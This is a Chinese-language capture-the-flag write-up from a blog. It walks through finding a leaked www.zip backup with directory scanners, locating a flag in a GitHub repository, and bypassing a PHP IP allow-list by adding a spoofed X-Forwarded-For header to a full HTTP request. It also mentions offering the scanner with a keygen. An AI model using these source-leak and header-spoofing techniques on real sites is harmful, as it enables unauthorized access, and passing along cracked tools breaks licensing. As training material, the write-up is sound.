提示:你知道网站备份吗?
这是一条简单的WEB源码泄漏题目,主要考察的是如何利用网站管理员的疏忽,直接通过备份/部署工具获得网站源码。
原理也很简单,如果管理员在备份网站的时候,不慎备份到了网站目录内部,那样就会留下一个包含网站所有代码的压缩包。
而这题是典型的win下备份的例子,WIN下网站目录多为www www-data site啊等网站目录,直接压缩就会压缩成www/www-data/site/ . zip/rar/7z 等等类似的文件
而这题正好就是www.zip文件,地址是:http://139.199.72.13:20019/www.zip
有人问:难道比赛的时候,我还得一个一个自己慢慢敲?来判断有没有这个文件?
这时候就要用到工具了,常用的是御剑WEB扫描(相信做安全的应该没人不知道吧)和DirBuster,相比之下DirBuster更加专业,但需要配置java环境,而且自带的字典也太大了一些,相比之下御剑WEB更符合竞赛要求和国情。
使用御剑选择DIR直接就扫描出来了
御剑的下载会放在文末,包括注册机
此类题目还有.git目录泄漏 SVN泄漏 phps等等,都属于直接的源码泄漏
提示:你知道全球最大交友网站吗
这题是群主自己加的料,也同样是很简单的一道题目
首先打开群主的github项目目录 https://github.com/Catsofsuffering/iBizSim-prediction-model
看到目录中的 flag.txt,打开查看文件内容
this is a SWCTF_Flag{139.199.72.13:20020}
find the php bug
<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
$cip = $_SERVER["REMOTE_ADDR"];
else
$cip = "0.0.0.0";
return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "Error!Your IP is not on the access list!";
}
?>
© 2019 GitHub, Inc.
很明显的php代码审计,关键点就是那三个if
典型的要求IP伪装,伪装方式是通过CLIENT_IP X_FORWARDED_FOR REMOTE_ADDR 三个header来决定客户端IP,并赋值给GetIPs变量
个人习惯使用XFF头,直接上burp,burp到处都是,就不发了,萌新用免费版都够了
GET / HTTP/1.1
Host: 139.199.72.13:20020
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
增加一行
X-FORWARDED-FOR: 1.1.1.1
变成这样
GET / HTTP/1.1
Host: 139.199.72.13:20020
Pragma: no-cache
X-FORWARDED-FOR: 1.1.1.1
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
拿到flag
本文作者:卖女孩的小火柴 - 搬砖中
本文链接:https://www.shinenet.cn/archives/55.html
最后修改时间:2019-11-15 19:55:40
本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!